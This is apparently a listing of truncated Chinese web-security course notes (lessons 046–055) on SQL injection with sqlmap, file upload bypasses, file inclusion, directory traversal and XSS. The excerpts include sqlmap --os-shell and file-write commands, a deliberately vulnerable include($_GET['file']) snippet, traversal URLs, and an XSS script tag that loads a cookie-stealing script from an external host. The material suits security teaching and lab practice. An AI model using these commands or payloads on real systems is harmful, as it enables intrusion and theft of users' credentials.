046-WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构
小迪SQL注入46~ 笔记总结一、权限操作-文件&命令&交互式测试:MYSQL高权限注入引出权限:–is-dba(误报) –privileges(只能通过很多false或者true判断,不明显) 推荐使用–current-user 引出文件:–file-read –file-write –file-dest引出命令:–os-cmd= –os-shell –sql-shell 1.python sqlmap.py -u “http://demo01/sqli/new.php?id=1“ –is-dba –is-dba(是否是数据库管理员)(会误报)或者==–current-user(获取当前用户名称,推荐)== current user: ‘root@localhost’,代表是最高权限Root权限 2.判断是否可注入:python sqlmap.py -u “http://demo01/sqli/new.php?id=1"使用 SQLMap 对提供的 URL 进行 SQL 注入测试。 存在注入点 且...
047-WEB攻防-PHP应用&文件上传&函数缺陷&条件竞争&二次渲染&黑白名单&JS绕过
小迪文件上传47~ 笔记总结 学习前必读:1、课前一定要明白:无文件解析==安全问题上,格式解析是一对一的(不能jpg解析php)==换句话来说有解析错误配置或后缀解析漏洞时才能实现格式差异解析 2、文件上传安全指的是攻击者通过利用上传实现后门的写入连接后门进行权限控制的安全问题,对于如何确保这类安全问题,一般会从原生态功能中的文件内容,文件后缀,文件类型等方面判断,但是漏洞可能不仅在本身的代码验证逻辑中出现安全问题,也会在语言版本,语言函数,中间件,引用的第三方编辑器等存在缺陷地方配合利用。另外文件上传也有多个存储逻辑,不同的文件存储方案也会给攻击者带来不一样的挑战! #测试环境安装参考:https://github.com/ffffffff0x/f8x https://github.com/fuzzdb-project/fuzzdb https://github.com/sqlsec/upload-labs-docker 1.docker安装 f8x -d 或 f8x -docker 2.进入文件夹 cd upload-labs-do...
048-WEB攻防-PHP应用&文件上传&中间件CVE解析&第三方编辑器&已知CMS漏洞
小迪文件上传48~ 笔记总结 #知识点: 1、PHP-中间件-文件上传-CVE&配置解析2、PHP-编辑器-文件上传-第三方引用安全3、PHP-CMS源码-文件上传-已知识别到利用 演示案例: ➢PHP-中间件-上传相关-Apache&Nginx➢PHP-编辑器-上传相关-第三方处理引用➢PHP-CMS源码-上传相关-已知识别到利用 #漏洞环境:vulhub (部署搭建)Vulhub - Docker-Compose file for vulnerability environment https://github.com/vulhub/vulhub 1、打开虚拟机 ,将下载好的对应文件vulhub-master通过xftp7传输至虚拟机上 2、进入对应的vulhub-master目录 3、在提供的Vulhub - Docker-Compose file for vulnerability environment查找对应想要复现的漏洞如:Apache HTTPD 多后缀解析漏洞,复制其Path路径httpd/apache_parsing_vulnerabil...
049-WEB攻防-文件上传&存储安全&OSS对象&分站&解析安全&解码还原&目录执行
小迪文件上传49~ 笔记总结 #文件-解析方案-执行权限&解码还原1、执行权限 文件上传后存储目录不给执行权限 原理:开启禁止目录执行,将服务器的文件上传后存储目录,取消读取和执行的权限 由于文件上传功能并未做过滤,直接上传包含后门的木马文件shell.php上传成功即可发现,phpinfo被执行了,该文件被解析为php脚本 当在小皮网址配置的==选择安全配置→开启禁止目录执行→将禁止执行的目录设置为上传目录(/1/upload)== 开启后,再次访问上传的木马文件,发现报错403,至此文件上传漏洞不能被利用 如何判断 1.如果目录下已经上传进去木马文件,访问其上传路径发现报错403禁止访问,可能是文件上传后存储目录不给执行权限 2、解码还原 数据做存储,解析固定(文件后缀名无关)文件上传后利用编码传输解码还原 当服务器把上传的文件,利用base64编码编码为数据存储,也就是说从根本上解决了文件上传漏洞的问题==,以数据存储就没有其他类型的文件解析即使上传后门文件,最...
050-WEB攻防-PHP应用&文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
小迪文件包含50~ 笔记总结文件包含-原理&分类&利用&修复1、原理程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为文件包含。在包含文件的过程中,如果文件能进行控制,则存储文件包含漏洞 文件包含 包含的文件就被当做当前脚本语言去代码执行了 2、漏洞原因:1、使用文件包含函数2、包含的文件可控 3、漏洞简单复现1.在本地网站下面创建一个include.php文件 代码写如include($_GET['file']);使用include函数来包$_GET['file'],这是危险的做法,因为用户可以通过修改URL参数传递恶意文件路径,导致安全漏洞。 2.创建1.txt,写入 3.访问对应文件路径,并传入参数http://192.168.232.195/demo01/include.php?file=1.txt 相当于include(‘2.txt’); 4、分类本地包含-Local File Include-LFI远程包含-Remote File ...
051-Web攻防-文件安全&目录安全&测试源码等
051-Web攻防-文件安全&目录安全&测试源码等知识点 1、文件安全-前后台功能点-下载&读取&删除2、目录安全-前后台功能点-目录遍历&目录穿越 演示案例: ➢文件安全-下载&删除-案例黑白盒➢目录安全-遍历&穿越-案例黑白盒 #文件安全-下载&删除-黑白盒1、下载=读取(获取源码)文件下载利用:下载敏感文件(数据库配置,中间件配置,系统密匙等文件信息) 常规下载URL:https://67.202.70.133/files/readfile.php (直接访问,会被默认以php执行文件解析,不能下载到本地,也不能看到源码) 可能存在安全URL:https://67.202.70.133/files/readfile.php?file=readfile.php (下载协议下载php文件 ,源码被下载至本地可以被看到) https://67.202.70.133/files/readfile.php?file=…/index.php https://67.202.70.133/files/rea...
052-Web攻防-XSS-Demo源码&小皮面板安装包等
052-Web攻防-XSS-Demo源码&小皮面板安装包等 #知识点:1、XSS跨站-输入输出-原理&分类&闭合2、XSS跨站-分类测试-反射&存储&DOM 演示案例:➢XSS跨站-输入输出-原理&分类&闭合➢XSS跨站-分类测试-反射&存储&DOM #XSS跨站-输入输出-原理&分类&闭合漏洞原理: 接受输入数据,输出显示数据后解析执行 XSS漏洞类型: 反射(非持续),存储(持续),DOM-BASE 拓展类型:jquery,mxss,uxss,pdfxss,flashxss,上传xss等常用标签:https://www.freebuf.com/articles/web/340080.html攻击利用:盲打,COOKIE盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等安全修复:字符过滤,实例化编码,http_only,CSP防护,WAF拦截等测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定) 1.反射性xss常见情况是攻击者通过==构造一个恶意链接的形...
053-Web攻防-XSS-PDF&SWF&SVG等环境工具
053-Web攻防-XSS-PDF&SWF&SVG等环境工具知识点: 1、XSS跨站-MXSS&UXSS2、XSS跨站-SVG制作&配合上传3、XSS跨站-PDF制作&配合上传4、XSS跨站-SWF制作&反编译&上传 演示案例: ➢MXSS&UXSS-CVE-2021-34506➢SVG&PDF&SWF-XSS&上传&反编译 SVG-XSS SVG(Scalable Vector Graphics)是一种基于==XML的二维矢量图格式,==和我们平常用的jpg/png等图片格式所不同的是SVG图像在放大或改变尺寸的情况下其图形质量不会有所损失,并且我们可以使用任何的文本编辑器打开SVG图片并且编辑它,目前主流的浏览器都已经支持SVG图片的渲染。 创建SVG格式的图片,并在源代码中加入**<script>alert(1)</script> xss弹窗代码,当访问打开此文件时候,自动弹出弹窗** SVG如...
054-Web攻防-XSS平台&复现源码&其他环境等
054-Web攻防-XSS平台&复现源码&其他环境等知识点 1、XSS跨站-攻击利用-凭据盗取 2、XSS跨站-攻击利用-数据提交 3、XSS跨站-攻击利用-网络钓鱼 4、XSS跨站-攻击利用-溯源综合 漏洞原理:接受输入数据,输出显示数据后解析执行基础类型:反射(非持续),存储(持续),DOM-BASE 拓展类型:jquery,mxss,uxss,pdfxss,flashxss,上传xss等 常用标签:https://www.freebuf.com/articles/web/340080.html 攻击利用:盲打,COOKIE盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等 安全修复:字符过滤,实例化编码,http_only,CSP防护,WAF拦截等 测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定) 前情提要 0、XSS跨站-攻击利用-Cookie盗取条件:无防护Cookie凭据获取 利用:xss平台或手写代码 触发代码 1<script src =https://xs.pe/WFb.jpg></script> ...
055-Web攻防-XSS防御&HttpOnly&CSP&靶场工具等
055-Web攻防-XSS防御&HttpOnly&CSP&靶场工具等知识点 1、XSS跨站-安全防御-CSP策略2、XSS跨站-安全防御-HttpOnly3、XSS跨站-安全防御-XSSFilter 常用标签:xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户https://xz.aliyun.com/t/4067 1.XSS跨站-安全防御-CSP123456789CSP (Content Security Policy 内容安全策略) 各种语言都存在,只不过设置不同内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单(当外部资源不在白名单内,禁止网站访问外部资源),它的实现和执行全部由浏览器完成,开发者只需提供配置。禁止加载外域代码,防止复杂的攻击逻辑。禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。禁止内联脚本执行(规则较严格,目前发现 GitHub 使用)。禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。合理使用上报可以及时...








